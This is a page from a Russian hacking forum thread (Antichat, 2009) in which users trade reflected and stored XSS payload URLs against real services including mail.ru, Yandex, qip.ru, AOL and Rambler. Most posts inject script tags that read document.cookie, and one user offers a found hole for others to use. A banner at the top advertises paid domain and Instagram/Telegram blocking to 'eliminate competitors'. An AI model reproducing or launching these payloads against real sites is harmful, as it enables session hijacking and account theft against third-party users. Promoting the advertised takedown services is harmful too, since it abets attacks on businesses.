Форум АНТИЧАТ - Пассивные xss на почтовых серверах

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Пассивные xss на почтовых серверах

Страница 5 из 15

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#41

10.05.2009, 18:43

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Отправить сообщение для wildshaman с помощью ICQ

Пассивка на mail.ru, работает онли в хроме:

Код:

http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,501,20,9&element=1&code="><script>alert(document.cookie)</script>

#42

21.05.2009, 20:45

FatalLerr0r

Познающий

Регистрация: 15.04.2009

Сообщений: 35

Провел на форуме:
193561

Репутация: 12

Отправить сообщение для FatalLerr0r с помощью ICQ

Пассивка на qip.ru
http://video.qip.ru/broadcast/view/?id=2172438&from="><script>alert('XSS by FatalLerr0r')</script>

#43

26.07.2009, 07:38

Sin3v

Участник форума

Регистрация: 16.07.2008

Сообщений: 159

Провел на форуме:
1063538

Репутация: 240

Отправить сообщение для Sin3v с помощью ICQ

Mail.ru
Работает через пост запрос в поле E-Mail

Цитата:

http://device.mail.ru/published/forgot.php

Последний раз редактировалось Sin3v; 26.07.2009 в 07:41..

#44

31.07.2009, 19:00

edge911

Участник форума

Регистрация: 21.02.2009

Сообщений: 228

Провел на форуме:
2175726

Репутация: 368

на yandex.ru создаем новое событие в календаре,
назваагние пишем любое , в описание <img src = http://artfile.ru/funfoto/b/v/1939_26_186_ArtFile_ru.jpg onload = alert(123);>
при просмотре события вылазит алерт"123"
p.s сори еси не туда написал )

mail.ru

#45

17.08.2009, 01:02

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

Провел на форуме:
2080216

Репутация: 150

Отправить сообщение для Sleep с помощью ICQ

mail.ru

Код:

http://g1.botva.mail.ru/registration.php?race=1<'><script>alert(document.cookie)</script>

#46

20.08.2009, 00:41

JOHNik

Познающий

Регистрация: 21.04.2009

Сообщений: 58

Провел на форуме:
146521

Репутация: 34

Отправить сообщение для JOHNik с помощью ICQ

Цитата:

Сообщение от Pavlov

http://translate.google.com/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums. xmbforum.com%2Ffiles.php%3Fpid%3D1361320%26aid%3D2 0274
http://translate.google.co.uk/translate?hl=ru&sl=en&tl=ru&u=http%3A%2F%2Fforums. xmbforum.com%2Ffiles.php%3Fpid%3D1361320%26aid%3D2 0274

То же самое и тут (PREF TM LM S)
такая же трабла и с AOL например:

Код:

http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>

просто это не те которые нужны.

но идея с переводом документа хорошая

Последний раз редактировалось JOHNik; 20.08.2009 в 00:58..

#47

25.08.2009, 19:38

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

Отправить сообщение для satana-fu с помощью ICQ

Цитата:

Сообщение от JOHNik

Код:

http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>

просто это не те которые нужны.

но идея с переводом документа хорошая

там же, куча пассивок, вывешивать не стал чтоб не флудить, но xss на каждом шагу, щя поищу активку

Код:

https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cac%3aWS%7cat%3aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aAOL%7csnt%3aScreenName&offerId=mail-second-en-us&seamless=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

#48

30.08.2009, 07:09

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

пассивная XSS на рамблер, только что нашел

Код:

http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&uid=4513&page=200&num=5&end=080911&type=16&start=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E0&iid=27203

Код:

http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&page=206&uid=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E3&end=080911&type=16&iid=27203&start=080910

Правда в этой строке их до фига и больше...

Последний раз редактировалось satana-fu; 30.08.2009 в 07:13..

#49

01.09.2009, 17:25

xss-faq

Познающий

Регистрация: 28.06.2009

Сообщений: 84

Провел на форуме:
1431764

Репутация: 140

Отправить сообщение для xss-faq с помощью ICQ

xss mail.ru

Код:

http://wifi.mail.ru/comments.html?point_id=6568&thread="><script>alert(document.cookie)</script>

xss yandex.ru

Код:

http://images.yandex.ru/cgi-bin/customize.pl?retpath=http://yandex.ru/yandsearch?text="><script>alert(document.cookie)</script>

Сам искал!

#50

09.09.2009, 00:01

vitaliy_n73

Участник форума

Регистрация: 02.07.2009

Сообщений: 130

Провел на форуме:
662870

Репутация: 56

Отправить сообщение для vitaliy_n73 с помощью ICQ

Вот пару месяцев назад нашел,думал буду пользоватся,ща как-то не пригодилось так чтоб зря не пропадала берите пользуйтесь на здоровье!

http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ea lert()%3C/script%3E

Страница 5 из 15

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Сценарии/CMF/СMS	7	04.02.2010 02:55
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

TEST QR: []

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход